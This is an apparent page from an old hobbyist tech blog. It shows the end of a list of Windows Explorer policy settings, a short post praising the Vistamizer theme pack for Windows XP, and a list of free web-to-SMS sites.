NoFavoritesMenu - Hides the Favorites menu
NoChangeStartMenu _ Disables changes to the Start Menu
NoFolderOptions _ Hides the Folder Options in the
ExplorerClearRecentDocsOnExit - Empty the recent Docs
folder on rebootNoLogoff - Hides the
Log Off .... in the Start Menu.

MAKE VISTA LOOK FOR XP

If you are still a Windows XP user like me, you should definitely check out this cool free software called Vistamizer, which can make your XP look like Vista.
While there has been quite some negative comments about Windows Vista since its release last year, one thing for sure is the new graphical interface of Vista is really cool.. a lot cooler than Windows XP.
So in order to make XP look like Vista, I use this cool stuff called Vistamizer.
This cool software will modifies your system files, and totally convert your system into the cool Vista GUI.
You will not remember how your old desktop looks like after installing Vistamizer.
The good thing about this software is that it will backup all the changes that have been made to your system, so you can easily revert it back to the original system setting.
I installed Vistamizer on my Windows XP few days back, and have no complaint on it so far. It's stable, and does not affect the system performance.
My friend actually thought that I have upgraded to Vista when I show them my new desktop . A great software to make XP look like Vista.

Send free SMS to mobile from your pc

Send free sms to mobile from your pc here is the listENJOY
https://zyb.com/
http://www.mobyko.com/
http://stepsms.com/
http://www.smstxtbox.com/web/
http://www.junglesms.com/
http://50sms.com/
http://www.ecosms.ch/
http://www.free--sms.com/index.go
http://www.pimpmysms.com/
http://www.islamweb.net/
http://www.phones.com/
http://www.devinosms.com/
http://gsms.se/
http://www.themobiweb.com/en/sms.html
http://my.phonegnome.com/
http://sms4u.biz/signup.php
http://simsor.com/register
http://www.mobik.com/mobik/client/
http://www.smsdiscount.com/en/index.html
http://4usms.net/
http://www.sendsmsnow.com/
http://www.unisms.uni.cc/
http://www.atrochatro.com/
http://www.gsmvault.com/
http://smscity.com/
http://www.sms2india.org/
http://www.freesms.web.tr.tc/
http://www.d1g.com/
http://thesmszone.com/
http://zyb.com/
http://www.vazu.com/
http://www.sms.ac/
http://www.agentsms.com/
http://www.mobizone.com/
http://www.yellowpages.com.eg/
http://www.boswtol.com/
www.masrawy.com/sms
http://www.resalh.com/
http://free-sms-message.com/index.htm
http://adleel.com/sms.htm
http://mobile.fares.net/sms/uae
http://www.itsalat.com/
http://www.quios.com/
http://www.clickatell.com/
www.ulluminati.ch/Nexus/sms.html
http://www.freesms.net/
http://www.free-sms.com/
http://www.lycos.co.uk/
http://www.sms.at/
http://www.sms.com/
http://www.smsyes.com/
www.smsuae.com/sms-uae
http://www.edihasms.com/
http://www.shortmessage.com/
www.worldxs.net/sms.html
www.hot.it/sms

Google